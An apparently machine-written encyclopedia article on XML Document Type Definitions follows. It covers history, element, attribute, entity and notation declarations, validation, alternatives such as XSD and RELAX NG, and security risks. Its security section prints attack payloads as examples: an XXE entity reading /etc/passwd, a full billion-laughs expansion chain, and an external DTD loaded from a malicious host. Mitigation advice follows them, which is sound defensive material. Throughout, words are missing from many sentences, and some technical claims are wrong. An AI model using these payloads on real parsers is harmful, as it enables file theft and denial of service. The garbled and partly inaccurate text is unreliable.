Fact-checked by Grok 2 weeks ago

Document type definition

A Document Type Definition (DTD) is a formal schema language defined in the Extensible Markup Language (XML) 1.0 specification that specifies the logical structure, elements, attributes, and entities allowed in an XML document, enabling validation of its conformance to predefined rules. Introduced as part of the XML standard by the (W3C) in 1998, the DTD serves as a mechanism within the document type declaration to enforce constraints on document content, ensuring consistency and interoperability in data exchange. It consists of markup declarations that define the grammar of the document, including element hierarchies, attribute types and defaults, and entity substitutions. DTDs can be embedded directly in an XML document as an internal subset or referenced externally via a as an external subset, allowing for modular reuse across multiple documents. Validating XML processors must read the entire DTD and report any violations of its constraints, such as invalid element nesting or undeclared attributes, distinguishing valid documents from merely well-formed ones. While powerful for basic structural validation, DTDs have limitations, including the inability to define complex data types or namespaces natively in early versions, leading to the development of alternatives like Definition (XSD) for more advanced needs. Despite these, DTDs remain a foundational component of XML, widely used in legacy systems and standards requiring simple validation.

Introduction

Definition and Purpose

A Document Type Definition (DTD) is a declarative schema language used in markup languages such as SGML and XML to define the legal structure of documents, specifying the permissible elements, their content models, attributes, entities, and notations. It serves as a that outlines the hierarchical organization and constraints for a class of documents, ensuring that only declared components can appear and in defined arrangements. Originating as part of the SGML standard, the DTD mechanism was adapted for XML to provide a lightweight yet robust way to express document constraints. The primary purposes of a DTD include enforcing document validity against predefined rules, thereby guaranteeing structural ; facilitating by standardizing document formats across applications and systems; and establishing a contractual framework for data exchange, where producers and consumers agree on expected content and organization. By constraining what constitutes a conforming , DTDs help prevent errors in and enable reliable and . Central to DTDs are key concepts distinguishing well-formed documents, which comply with the basic syntactic rules of the (e.g., proper tag nesting and attribute quoting in XML), from valid documents, which must additionally satisfy the semantic constraints defined in the DTD. DTDs achieve this through content models that restrict element occurrences using operators for sequences (comma-separated), choices (vertical bars), and repetitions (asterisks, plus signs, or question marks), expressed in a parenthesized, EBNF-like notation—for instance, (element1, element2*) indicates a sequence of a required element1 followed by zero or more element2 instances. This declarative approach allows precise control over document complexity without procedural logic, promoting reusability and modularity in schema design.

Historical Development

The Document Type Definition (DTD) originated as a core component of the (SGML), formalized in the (ISO) standard ISO 8879:1986, which defined SGML as a meta-language for describing markup structures in documents to separate content from presentation. This standard introduced DTDs to specify the logical structure, elements, attributes, and entities of documents, enabling generalized markup for interchange and processing across systems. Early adoption of SGML DTDs extended to the development of , where versions prior to HTML 2.0 (circa 1990–1995) were defined using SGML DTDs to outline permissible tags and structure, as distributed by and collaborators at . The first formal HTML DTD appeared in July 1992 via the www-talk mailing list, establishing as an SGML application and influencing web document standards. By the mid-1990s, HTML 4.0 (1997) continued this conformance to ISO 8879, bridging SGML's rigorous validation to the burgeoning . The transition to Extensible Markup Language (XML) marked a pivotal evolution, with XML 1.0 issued as a W3C Recommendation on February 10, 1998, positioning XML as a simplified of SGML while retaining DTDs for validation with modifications for web efficiency, such as stricter case-sensitivity and deterministic content models. These simplifications included restrictions on parameter entity references in the internal DTD , limiting them to markup declarations only—unlike the broader allowances in SGML—to reduce parsing complexity and ambiguities. XML DTDs thus facilitated easier implementation, removing SGML features like link processes and optional notations. DTDs influenced subsequent web standards, notably in 1.0 (W3C Recommendation, January 26, 2000), which reformulated as an XML application using three DTD variants—Strict, Transitional, and Frameset—to enforce stricter syntax while maintaining . Post-2000, the release of 1.0 (W3C Recommendation, May 2, 2001) introduced a more expressive, XML-native alternative for schema definition, leading to declining reliance on DTDs for new applications due to Schema's support for data types, namespaces, and modularity. Despite this shift, DTDs persisted in legacy systems and certain publishing workflows, though trends favored Schema and other validators like by the mid-2000s.

Document Association

Declaration Methods

Document Type Definitions (DTDs) are associated with XML documents through the DOCTYPE declaration, which appears in the XML and specifies the along with optional references to DTD content. The basic syntax is <!DOCTYPE root-element-name [internal-subset]> for an internal DTD or <!DOCTYPE root-element-name external-ID> for an external reference, where external-ID can be a or identifier followed optionally by an internal subset in square brackets. This declaration defines the document's grammar and must conform to the production rules outlined in the XML specification to ensure proper parsing. The identifier references a DTD via a , such as SYSTEM "example.dtd", suitable for local files or web-accessible resources, allowing parsers to retrieve the external directly. In contrast, the identifier is used for widely recognized DTDs and consists of a formal public identifier (FPI) followed by a fallback, formatted as PUBLIC "-//organization//DTD description//language" "uri", exemplified by PUBLIC "-//W3C//DTD [XHTML](/page/XHTML) 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd". This structure enables interoperability by prioritizing standardized FPIs while providing a system identifier for if the FPI is not cataloged locally. The DOCTYPE declaration must be placed after any XML declaration (e.g., <?xml version="1.0"?>) and before the document's , ensuring it is processed during the phase of . Within external subsets, conditional sections allow selective inclusion or exclusion of declarations using INCLUDE or IGNORE keywords, such as <![INCLUDE [ <!-- declarations --> ]]> or <![IGNORE [ <!-- ignored content --> ]]>; these are resolved via entity references and apply only to external DTDs, not the internal subset. If multiple DOCTYPE declarations appear in a single document, only the first is considered valid by conforming processors, with subsequent ones treated as errors; non-validating parsers may ignore external references entirely, but validating parsers must fetch and apply the specified DTD without fallback to defaults unless explicitly defined by the application. Internal subset declarations take precedence over those in the external subset in case of conflicts, promoting a layered approach to DTD management.

Internal and External Subsets

The Document Type Definition (DTD) in XML can be divided into internal and external subsets, each serving distinct roles in defining the structure and constraints for an XML document. The internal subset is embedded directly within the DOCTYPE declaration using square brackets, allowing markup declarations to be specified inline with the document content. This approach ensures the DTD is self-contained, eliminating the need for external resources and making the document portable without dependencies on network access or file systems. However, the internal subset has limitations, particularly regarding parameter entities: references to parameter entities are permitted only in positions where markup declarations can occur (e.g., between declarations), but not within the declarations themselves, which restricts modularity and preprocessing capabilities compared to external subsets. In contrast, the external subset is referenced separately from the internal subset via a system identifier () or a public identifier (FPI) in the DOCTYPE declaration, loading the DTD content from an external file or resource. This design promotes modularity by enabling the DTD to be shared across multiple XML documents, facilitates caching for repeated use, and fully supports parameter entities within markup declarations, allowing for advanced preprocessing and conditional inclusion of rules. External subsets are particularly advantageous in environments requiring consistent validation across distributed , though they introduce potential issues such as dependency on resource availability. When both subsets are present in a DOCTYPE declaration—such as <!DOCTYPE root-element SYSTEM "external.dtd" [internal declarations]>—they are combined to form the complete DTD, with the processed first and overriding any conflicting declarations (e.g., redefinitions of entities or elements) from the . proceeds sequentially: the internal subset is read immediately, followed by the external subset if referenced, integrating all declarations into a unified set for validation. Error handling differs by subset; failures in the internal subset (e.g., syntax errors) render the document ill-formed and fatal, while external subset issues, such as network failures preventing loading, must be reported by validating processors but do not necessarily invalidate the document unless validity checking is enforced. Use cases for internal subsets are ideal for simple, standalone XML configurations where self-containment is prioritized, such as in small scripts or isolated data exchanges that do not require shared rules. External subsets, however, excel in enterprise XML applications, where modularity allows a single DTD to enforce standards across numerous documents, supporting scalable validation in systems like document management or data interchange protocols.

Core Declarations

Element Type Declarations

Element type declarations in a Document Type Definition (DTD) specify the permissible content for elements in an XML document, defining the structure and hierarchy of the markup. These declarations use the syntax <!ELEMENT Name contentspec>, where Name identifies the type and contentspec describes the allowed content model. The content specification can take several forms, including predefined keywords or complex expressions built from child element names and operators. The simplest content models are the keywords EMPTY, which permits no content within the element (e.g., <!ELEMENT br EMPTY> for a element), and ANY, which allows any well-formed XML content, including arbitrary elements and character data (e.g., <!ELEMENT note ANY>). For elements containing only parsed character data, the model #PCDATA is used (e.g., <!ELEMENT title (#PCDATA)>), restricting the content to text without nested elements. Structured models, known as element content, specify sequences of child elements using the production for children, which combines choices, sequences, and repetition operators. Content models employ specific operators to define relationships among child elements: the comma (,) denotes a required sequence (e.g., (head, body) for ordered child elements); the (|) indicates a choice (e.g., (p | div) for alternatives); the (?) makes an item optional (zero or one occurrence, e.g., (img)?); the (*) allows zero or more repetitions (e.g., (li)*); and the plus sign (+) requires one or more repetitions (e.g., (li)+). These operators can be nested within parentheses to build hierarchical models, such as <!ELEMENT article ([title](/page/Title), (section | para)+)>, ensuring a title followed by one or more sections or paragraphs. Mixed content models integrate #PCDATA with optional child elements, declared as (#PCDATA | Name)* or simply (#PCDATA) for text-only, where the permits any interleaving of text and specified elements in any order and quantity (e.g., <!ELEMENT p (#PCDATA | em | strong)*> for paragraphs with inline emphasis). In XML, mixed content models must list all possible element names explicitly after #PCDATA and end with * to allow flexibility, but they cannot include sequences or other mixtures that introduce ambiguity. A key requirement for all content models in XML DTDs is : the model must be unambiguous, allowing an XML to predict the next expected solely from the prior without lookahead beyond one element. This ensures efficient ; for instance, choices like (a | b, c) are invalid if they could match the same sequence in multiple ways, violating the deterministic content model validity constraint. Such restrictions prevent nondeterministic grammars, promoting reliable validation while maintaining compatibility with SGML heritage.

Attribute List Declarations

Attribute list declarations in a Document Type Definition (DTD) specify the attributes permitted for a given element type, including their data types, default values, and any associated constraints. These declarations ensure that XML documents adhere to predefined rules for attribute usage, facilitating validation and . Defined in the XML 1.0 specification, an attribute list declaration uses the <!ATTLIST> keyword followed by the element name and one or more attribute definitions. The syntax for an attribute list declaration is <!ATTLIST Name (S? (AttDef S? E) | S) E>, where Name identifies the type, AttDef describes each attribute, S denotes optional whitespace, and E is an or the end of the declaration. Each AttDef follows the form Name AttType S? DefaultDecl, with the attribute name being a Name production, AttType specifying the type, and DefaultDecl defining the default handling. Multiple attributes for the same element are listed sequentially within a single <!ATTLIST> declaration. For example, <!ATTLIST [book](/page/Book) [title](/page/Title) [CDATA](/page/CDATA) #REQUIRED> declares a required title attribute of type CDATA for the book element. Attribute types fall into three categories: string types, tokenized types, and enumerated types. The string type [CDATA](/page/CDATA) treats the attribute value as character data, allowing any string except the less-than sign (<) or ampersand (&), which must be escaped. Tokenized types include ID for unique identifiers (ensuring no two elements share the same ID value across the document), IDREF for single references to an ID, IDREFS for space-separated lists of IDREFs, ENTITY for references to unparsed entities, ENTITIES for lists thereof, NMTOKEN for name tokens (conforming to the Nmtoken production without colons), and NMTOKENS for lists of NMTOKENs. Enumerated types consist of either a NotationType (matching a declared notation name) or an Enumeration (a parenthesized list of Nmtokens separated by vertical bars, e.g., (red | green | blue)). These types impose validity constraints, such as uniqueness for ID (one per element type) and proper referencing for IDREF and NOTATION. Default value declarations determine how attribute values are handled if not explicitly provided in the instance document. The keyword #REQUIRED mandates that the attribute must appear in every occurrence of the element. #IMPLIED makes the attribute optional with no default value supplied by the parser. #FIXED followed by a quoted value (e.g., #FIXED "en") requires that any provided value matches the fixed one, or the parser inserts it if absent. A plain quoted value (e.g., "default") provides a default that the parser inserts if the attribute is omitted. These defaults apply only to and validity checks, and fixed values must align with the attribute type. Special attributes like ID and IDREF enable cross-referencing within the document, with ID values required to be unique and non-empty, while IDREF values must match existing IDs at validation time. The NOTATION type links attributes to declared notations, typically for unparsed external entities, ensuring the value corresponds to a notation name. These mechanisms support structured data relationships but are limited in XML, as DTDs do not support namespace-aware attribute declarations or defaults, restricting their use in namespaced documents. Constraints on attribute list declarations include prohibitions on duplicate attribute names within the same <!ATTLIST> (a well-formedness requirement) and across the entire DTD for the same element. Attribute names must be unique per element, and types like ID carry document-wide implications for uniqueness. In XML contexts, DTDs cannot declare default namespace prefixes or qualified attributes, limiting their expressiveness compared to later schema languages. These rules ensure predictable parsing but highlight DTDs' simplicity over more advanced validation tools.

Entity Declarations

Entity declarations in a Document Type Definition (DTD) define named entities that serve as placeholders for reusable , enabling text replacement during XML . These declarations use the <!ENTITY> construct and are essential for modularizing , avoiding repetition, and incorporating external resources. General entities are referenced in the document instance with &name;, while parameter entities, referenced with %name;, are restricted to use within the DTD itself for building modular grammars. General entities can be internal or external. An internal general entity declaration provides replacement text directly within the DTD, using the syntax <!ENTITY name "replacement text">. For example, <!ENTITY copyright "Copyright © 2025"> allows the entity &copyright; to insert the specified text inline during parsing. External general entities reference content from outside the DTD via a system identifier, as in <!ENTITY example SYSTEM "http://example.com/data.xml">, which loads and parses the external resource when referenced. These entities must contain well-formed XML if parsed, and their expansion occurs by substituting the fetched content for the reference. Parameter entities facilitate DTD modularity by allowing substitutions within markup declarations, declared as <!ENTITY % name "replacement text"> for internal or <!ENTITY % name SYSTEM "uri"> for external. They are particularly useful for including common declaration blocks, such as <!ENTITY % iso-pub SYSTEM "http://www.iso.org/pub.dtd"> %iso-pub;, which inserts external DTD fragments. However, in the internal DTD subset (within the document's DOCTYPE declaration), parameter entity references face XML restrictions: they cannot appear in markup declarations like element or attribute lists, only in entity or notation declarations, to prevent unintended redefinitions of core grammar rules. External parameter entities, loaded from the DTD subset, bypass some of these limits but must still adhere to well-formedness. XML defines five predefined general entities that all processors must recognize without explicit declaration: &amp; for &, &lt; for <, &gt; for > (only outside attribute values or tags), &apos; for ', and &quot; for ". These escape special characters to ensure valid markup, with their internal declarations using character references like <!ENTITY lt "&amp;#60;"> to avoid . Unparsed entities, typically external and declared with <!ENTITY name SYSTEM "uri" NDATA notation-name>, hold non-XML data (e.g., binary files) and are referenced only in attributes of type or ENTITIES, requiring a corresponding notation declaration for processing. Entity expansion follows strict rules during the phase, prior to DTD validation, where references are replaced by their declared content to form the logical document structure. For internal , the replacement text is scanned for and references (which are expanded), but general references within it are left unexpanded to prevent infinite loops—a Well-Formedness Constraint (WFC) explicitly forbids recursive references. External are retrieved, processed for any text declaration (specifying encoding), and integrated similarly, with non-validating parsers potentially skipping some external subsets. This expansion mechanism ensures promote reusability while maintaining document integrity, though it imposes limits like a maximum expansion depth to mitigate denial-of-service risks in processing.

Notation Declarations

Notation declarations in Document Type Definitions (DTDs) serve to identify the format of non-XML , such as or other external resources, allowing XML processors to recognize and potentially invoke appropriate applications for handling them. These declarations provide a name for the notation along with an external identifier that specifies how to access the notation or the software needed to process it. Primarily, notations are associated with unparsed entities, which reference non-XML content, enabling the inclusion of or within XML documents without it as markup. The syntax for a notation declaration follows the form <!NOTATION Name (SYSTEM "SystemLiteral" | PUBLIC "PublicID" "SystemLiteral")>, where Name is a for the notation. In the SYSTEM form, the declaration specifies a system-dependent or identifier pointing to the notation's , as in <!NOTATION gif SYSTEM "http://example.com/example.gif">, which might reference a format. The PUBLIC form includes a public identifier (often a Formal Public Identifier or FPI) followed by a system literal, providing a standardized name for broader , for example: <!NOTATION gif PUBLIC "-//IETF//NONSGML GIF 89a//EN" "http://example.com/example.gif">. Notation names must be unique within the DTD and declared before any references to them in or attribute declarations. In XML, notations are strictly tied to unparsed entities through the NDATA declaration in entity definitions, where the notation name indicates the data's type, but the DTD itself performs no validation on the external data's conformance to that notation. Validating XML processors must report if a referenced notation is undeclared, enforcing the constraint that all notations be predefined. This mechanism ensures that applications can be notified of the data format without requiring the parser to interpret the content. Originating from SGML (ISO 8879:1986), notation declarations were commonly used to integrate multimedia elements like images, audio, and formatted text into documents by linking non-SGML entities to external processing tools. In modern XML contexts, their use has become limited, as alternatives like provide more robust mechanisms for defining and validating complex data types, reducing reliance on notations for non-XML integration.

Validation Mechanics

Parsing and Validation Process

The parsing and validation process for a Document Type Definition (DTD) in XML begins with the XML loading the DTD, which may consist of an internal subset embedded within the document's DOCTYPE declaration and an optional external subset referenced via or identifiers. The validating must read and process the entire DTD, including all external parsed entities it references, to construct the necessary models for validation. Once loaded, the builds models from type declarations, which specify allowable structures such as EMPTY, ANY, mixed , or sequences of elements, and attribute list declarations that define attribute types (e.g., , , NMTOKEN), default values, and required status. Following DTD loading and model construction, the processor parses the XML entity, resolving entity references and constructing the tree while performing checks, such as proper nesting and matching. For validation, the processor then verifies conformance by ensuring the document's root matches the name declared in the DOCTYPE and that the overall structure adheres to the built content models. Specific validity checks include confirming presence and order against the content model (e.g., ensuring required children are present and in sequence), validating attribute values against their declared types and applying defaults if unspecified, expanding entity references to match declared entities without undeclared usage, and enforcing uniqueness of attribute values across the document. Parser behaviors differ based on configuration: non-validating (standalone) parsers may skip external DTD subsets if the XML declaration includes standalone="yes", focusing only on , while validating parsers must fully process the DTD and report all validity constraint violations as . In implementations like , validation is enabled via options such as XML_PARSE_DTDVALID during parsing, with standalone mode configurable to limit external entity loading for and performance. Error reporting in validating parsers treats validity mismatches as non-fatal that must be reported, though processing may continue at the user's discretion, whereas fatal errors halt parsing immediately. Performance considerations in DTD validation include caching mechanisms for external subsets to avoid repeated network fetches, often implemented via XML catalogs in parsers like Apache Xerces, which store grammar representations for reuse across documents. Basic DTD validation does not natively support namespaces, treating them as part of qualified names without special handling, which can limit its use in namespaced XML environments.

Limitations in XML Context

Document Type Definitions (DTDs), while functional for basic structure validation in XML, face significant constraints when applied within the XML framework, particularly when contrasted with their broader capabilities in the originating SGML standard. These limitations stem from XML's design priorities, such as namespace integration and advanced data modeling, which DTDs were not updated to fully accommodate. A primary limitation is the lack of namespace awareness in DTDs. Unlike modern XML processing, DTDs cannot distinctly declare or validate elements and attributes using namespace prefixes, treating qualified names as literal strings without recognizing their URI-bound semantics. This results in validation failures or ambiguities when documents employ multiple vocabularies, as the DTD constrains only lexical appearances rather than expanded names. For instance, elements from different namespaces with the same local name cannot be differentiated, leading to incomplete or erroneous validation. DTDs also suffer from weak typing mechanisms, offering only rudimentary attribute types such as , , IDREF, and enumerated lists, with no support for numeric types like integers or decimals, nor for via regular expressions. Element content is largely restricted to undifferentiated PCDATA or mixed models without facets for constraints like minimum or maximum values, length limits, or lexical patterns—features essential for rigorous in applications like electronic commerce or configuration files. This paucity forces applications to perform post-validation type checking, undermining the efficiency of DTD-based validation. Furthermore, DTDs provide no true or advanced , relying solely on entities for limited , which proves inadequate for constructing complex, extensible across multiple documents. Without mechanisms for type , schema inclusion from diverse sources, or hierarchical extensions, designing and maintaining large-scale XML vocabularies becomes cumbersome, often requiring verbose duplication of declarations. This low-level entity approach lacks the precision and needed for modular schema development in contemporary XML ecosystems. Post-1998 developments have rendered DTDs increasingly outdated for XML use, as they cannot natively validate against XML 1.1 features such as expanded character sets for names or alternative normalizations. The W3C has highlighted these shortcomings since the 2004 editions of specifications, positioning DTDs as legacy tools insufficient for evolving XML standards and recommending schema languages for new implementations to ensure compatibility and expressiveness.

Practical Examples

Basic DTD Syntax

A Document Type Definition (DTD) specifies the syntax of XML documents through a series of declarations that define the structure, attributes, entities, and notations used within them. These declarations form the basic building blocks of a DTD and are typically enclosed within a DOCTYPE declaration in an XML document. The syntax is formal and follows specific production rules outlined in the XML specification. Element type declarations define the allowable content model for elements, specifying what child elements or data can appear inside them. The basic syntax is <!ELEMENT name content-spec>, where the content-spec describes the structure, such as a sequence of required child elements. For instance, a simple declaration for a "book" element that must contain a "title" followed by an "author" is written as <!ELEMENT book (title, author)>. This indicates that "book" is a container element with exactly those two child elements in sequence, with no other content permitted. More complex content models, such as choices or repetitions, are detailed in the core declarations section. Attribute list declarations specify the attributes that can be associated with an element, including their data types and whether they are required or optional. The syntax follows <!ATTLIST element-name attribute-name attribute-type default-declaration>. A common example is <!ATTLIST book isbn CDATA #REQUIRED>, which declares an "isbn" attribute for the "book" element as character data (CDATA), making it mandatory for every "book" instance. The CDATA type allows arbitrary text without further parsing, while the #REQUIRED keyword enforces presence. Entity declarations provide a way to define reusable text or external resources, promoting modularity in the DTD. The general syntax is <!ENTITY name "replacement text"> for internal entities. An example is <!ENTITY copyright "© 2025">, which defines a "" entity that can be referenced via &copyright; to insert the symbol and year wherever needed. External entities follow a similar pattern but reference files, and unparsed entities (for non-XML data) are covered below. Notation declarations identify the format of non-XML data, such as images, that may be referenced in the document. The syntax is <!NOTATION name SYSTEM "system-identifier"> for system-specific notations. For example, <!NOTATION jpeg SYSTEM "http://www.iana.org/assignments/media-types/image/[jpeg](/page/JPEG)"> declares a notation named "jpeg" pointing to the IANA registration for the media type via a . Notations are often combined with unparsed , which reference external without it as XML. The unparsed entity syntax is <!ENTITY name SYSTEM "system-literal" NDATA notation-name>, as in <!ENTITY logo SYSTEM "logo.jpg" NDATA jpeg>, linking the "logo" entity to a file via the previously declared notation. This allows XML documents to include references to non-textual content while maintaining validation.

Complete XML Document with DTD

A complete XML document incorporating a Document Type Definition (DTD) integrates the DOCTYPE declaration directly within the file, defining the permissible structure, elements, attributes, and entities for validation. This approach, known as an internal DTD subset, allows self-contained documents that can be parsed and validated by conforming XML processors. The following example illustrates a simple library catalog, where the root element is library, containing zero or more book elements, each with a required isbn attribute and a title child element that may reference an entity for the publisher name. Here is the full XML document with its internal DTD:
xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library [
  <!ELEMENT library (book*)>
  <!ELEMENT book (title)>
  <!ATTLIST book isbn ID #REQUIRED>
  <!ENTITY publisher "Example Press">
]>
<library>
  <book isbn="BK-123-456-789-0">
    <title>Sample Book &publisher;</title>
  </book>
</library>
In this document, the DTD specifies that the library element must contain zero or more book elements (using the * quantifier), each book requires exactly one title child (containing parsed character data, implied by default), and the isbn attribute is mandatory with a unique identifier type to prevent duplicates across the document. The entity publisher is expanded during parsing to insert "Example Press" in the title content. During validation, an XML parser first reads the DOCTYPE declaration to load the internal DTD subset, then processes the document instance against it. It verifies the root element matches library, checks that all book elements appear only as direct children of library and conform to the content model (exactly one title subelement), ensures the isbn attribute is present on every book with a valid ID value (no reuse, no empty string), and replaces entity references like &publisher; with their declared values while checking for well-formedness. If the document passes, it is valid; otherwise, the parser reports violations such as undeclared elements or missing required attributes. For instance, omitting the isbn attribute would trigger an error, as #REQUIRED mandates its presence, potentially halting validation in strict processors. For external DTD references, the DOCTYPE can point to a separate via a system identifier (), enabling reuse across multiple documents without embedding the full DTD. This is useful for standardized schemas in larger systems. Consider the same example, but with the DTD in an external at http://example.com/library.dtd containing the identical declarations:
xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library SYSTEM "http://example.com/library.dtd">
<library>
  <book isbn="BK-123-456-789-0">
    <title>Sample Book &publisher;</title>
  </book>
</library>
The parser fetches the external DTD from the specified , merges it with any internal if present, and performs the same validation checks as in the internal case, ensuring network accessibility and proper . Common errors here include unreachable URIs or mismatches between the external DTD and document expectations, such as undeclared entities causing fatal failures.

Modern Alternatives

XML Schema Definition

XML Schema, formally known as the XML Schema Definition Language (XSD), is a (W3C) recommendation published on May 2, 2001, that provides an XML-based language for defining the structure, content, and data types of XML documents. Unlike DTDs, which use a separate syntax, XSD schemas are themselves valid XML documents, enabling seamless integration with XML tools and parsers. Key features include native support for XML namespaces to avoid naming conflicts in modular designs, complex type definitions that allow nested structures with elements and attributes, and type inheritance through mechanisms like extension and restriction, where new types derive from base types such as the root anyType. These capabilities address limitations in DTDs, such as the lack of namespace awareness and rigid content models. A major advantage of XML Schema over DTDs is its robust datatype system, defined in Part 2 of the specification, which includes 19 primitive built-in types such as xsd:string and over 40 built-in types overall (including derived types like xsd:integer for whole numbers), with optional pattern facets using regular expressions for validation (e.g., matching email formats), and derived types for decimals, dates, and URIs. This enables precise constraint enforcement on element and attribute values, far beyond DTDs' limited token-based typing. Additionally, XSD supports global declarations for reusable elements and attributes across schemas, unlike DTDs' more localized approach, and promotes modularity via <xs:import> for referencing schemas in different namespaces and <xs:include> for embedding schemas in the same namespace, allowing large-scale, maintainable definitions. Basic XSD syntax revolves around the <xs:schema> root element, typically declared with the namespace xmlns:xs="http://www.w3.org/2001/XMLSchema". For instance, a simple schema might define a as follows:
xml
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="root" type="xs:string"/>
</xs:schema>
More complex structures use <xs:complexType> to specify content models like sequences or choices, with <xs:attribute> for attributes and <xs:sequence> for ordered children. Annotations enhance readability and tool support through <xs:annotation><xs:documentation>description</xs:documentation></xs:annotation>, which can be attached to any component. By the 2010s, XML Schema had emerged as the de facto standard for XML validation in web services, notably underpinning SOAP (Simple Object Access Protocol) message envelopes and WSDL (Web Services Description Language) definitions, effectively supplanting DTDs in enterprise and web applications due to its richer expressiveness and XML compatibility.

RELAX NG and Schematron

RELAX NG, formalized through the OASIS RELAX NG Technical Committee and approved as a specification in 2001, serves as a schema language for XML that defines patterns for document structure and content. It supports dual syntaxes: an XML-based syntax that aligns with XML's native format and a compact, non-XML syntax resembling a context-free grammar for enhanced readability. Unlike DTDs, RELAX NG avoids strict determinism requirements in content models, allowing more flexible specifications of patterns and contexts, such as mixed content without prohibitive restrictions. For instance, in compact syntax, a simple pattern for a division element containing a title might be expressed as div { element title { text } }, enabling modular definitions that reference and extend other patterns. Schematron, developed in the early and standardized by ISO/IEC 19757-3, is a rule-based validation language that uses expressions to assert conditions within XML documents. The current edition is ISO/IEC 19757-3:2025 (published September 2025), which introduces support for 3.1 and new schema elements such as group and library for improved modularity. It focuses on semantic validation rather than structural patterns, allowing checks like "if an element A exists, then element B must follow," which are difficult to express in grammar-based schemas. These assertions enable targeted reporting of violations, making Schematron particularly suited for verifying or domain-specific rules that complement pattern-oriented languages like . RELAX NG offers advantages in readability and modularity due to its grammar-like syntax and ability to compose schemas from reusable named patterns, facilitating easier maintenance for complex documents compared to DTDs' rigid structures. Schematron excels in enforcing custom business rules, such as ensuring contextual relationships across an XML instance, and integrates well with other validators like Jing, a Java-based implementation that supports both syntaxes for efficient processing. Since the mid-2000s, and Schematron have gained preference in documentation standards, notably in V5.0 onward, where defines the core vocabulary and Schematron adds semantic constraints, promoting extensible open standards without reliance on DTDs.

Security Implications

Common Vulnerabilities

One of the primary security risks associated with Document Type Definitions (DTDs) in XML processing is the XML External Entity (XXE) attack, where attackers exploit external entity declarations to access unauthorized resources. In an XXE attack, a malicious XML document defines an external entity using a SYSTEM identifier pointing to a local file or remote URL, such as <!ENTITY xxe SYSTEM "file:///etc/passwd">, which, when parsed, can disclose sensitive file contents like system passwords or configuration data if the entity is referenced in the document body. This vulnerability arises because DTDs allow parsers to resolve and incorporate external data, potentially leading to server-side request forgery (SSRF) by directing the parser to fetch internal network resources or external malicious content. Another significant threat is the , also known as an exponential entity expansion attack, which targets the recursive expansion of internal entities defined in a DTD to cause . Attackers craft a DTD with nested entities, such as <!ENTITY lol "lol"> followed by <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> (10 references), <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> (10 references), and continuing similarly up to <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> (10 references), where invoking &lol9; in the XML body expands to billions of characters (approximately 3 billion in the standard case), exhausting memory and CPU resources during parsing. This attack leverages DTD's entity substitution mechanism without requiring external resources, making it effective against parsers that do not limit depth, and can crash applications or servers by inflating small inputs into gigabytes of output. Recent instances include the in (CVE-2024-1455, 2024) and an entity expansion in a parser (CVE-2025-3225, 2025), underscoring continued risks in unpatched third-party XML processors. External DTD and notation loading introduce additional risks when parsers fetch DTDs from untrusted URIs specified in the DOCTYPE declaration, such as <!DOCTYPE root SYSTEM "http://malicious-site.com/evil.dtd">, potentially enabling injection or . If the remote DTD contains malicious entities or scripts, the parser may execute or incorporate them, leading to SSRF, , or leakage of sensitive information to attacker-controlled servers; notations, similarly, can reference external binaries or handlers that trigger unintended actions. These issues persist in environments where network access is permitted during parsing, amplifying the for supply-chain compromises. Historically, XXE vulnerabilities have been prevalent in PHP applications relying on libxml, the default XML parser, due to its enabled external entity processing before mitigation features were widely adopted. For instance, prior to patches in 2014, libraries like PHPExcel (versions before 1.8.0) were susceptible to XXE via libxml, allowing file disclosure in applications such as ; this was addressed in CVE-2014-2054 by disabling external entity loading. The introduction of libxml_disable_entity_loader() in PHP 5.2.11 provided a partial fix, but many legacy systems and unpatched codebases remain vulnerable, as seen in ongoing issues with outdated PHP versions and third-party integrations. However, since PHP 8.0 (), external entity loading is disabled by default, reducing risks in updated environments.

Mitigation Strategies

To mitigate security risks associated with Document Type Definitions (DTDs) in XML processing, such as XML External Entity (XXE) attacks, the primary recommendation is to disable external entity processing entirely. This can be achieved through parser-specific flags; for instance, in the library (version 2.9.0 or later), avoid the XML_PARSE_DTDLOAD option to prevent loading external DTD subsets and use XML_PARSE_NONET to block network access for entity resolution, ensuring no external resources are fetched during parsing. Similarly, in Java's DocumentBuilderFactory, enable secure processing with factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true) and disallow DOCTYPE declarations via factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). These configurations prevent the expansion of potentially malicious entities without affecting core XML parsing. When DTD usage cannot be avoided, prefer internal DTD subsets over external ones to eliminate remote resource dependencies, as internal declarations are contained within the document and do not require network fetches. For cases involving identifiers in external DTDs, implement validation against a strict allowlist of trusted URIs in a custom entity resolver, rejecting any unapproved sources to block unauthorized data access or injection. This approach limits exposure while maintaining necessary validation, though it requires rigorous auditing of the allowlist. Migrating to modern schema languages like Definition (XSD) or provides a more secure alternative, as neither supports parameter or external entities in the manner of DTDs, thereby inherently avoiding XXE pitfalls without additional parser flags. validation focuses on structured type definitions and namespaces, disabling dynamic entity resolution by default and preventing server-side request forgery (SSRF) via non-fetched schemaLocation attributes. similarly emphasizes pattern-based validation without entity mechanisms, offering equivalent security benefits alongside improved expressiveness for complex documents. Secure parsing libraries aligned with guidelines, such as those incorporating defusedxml in , further enforce these protections during migration. Additional best practices include input sanitization by stripping or escaping DOCTYPE declarations from untrusted XML inputs before , using tools like expressions or dedicated libraries to neutralize potential definitions. Network restrictions, such as rules or parser options like XML_PARSE_NONET in , should prohibit all outbound connections during XML processing to counter SSRF attempts. Finally, auditing for unparsed notations and expansions is essential; limit entity expansion depth (e.g., via MaxCharactersFromEntities in .NET) and scan code with tools like to detect insecure parser configurations. These measures collectively address common vulnerabilities like XXE by prioritizing prevention over detection.

References

  1. [1]
    Extensible Markup Language (XML) 1.0 (Fifth Edition) - W3C
    Nov 26, 2008 · XML provides a mechanism, the document type declaration, to define constraints on the logical structure and to support the use of predefined ...Namespaces in XML · Abstract · Review Version · First Edition
  2. [2]
  3. [3]
  4. [4]
  5. [5]
  6. [6]
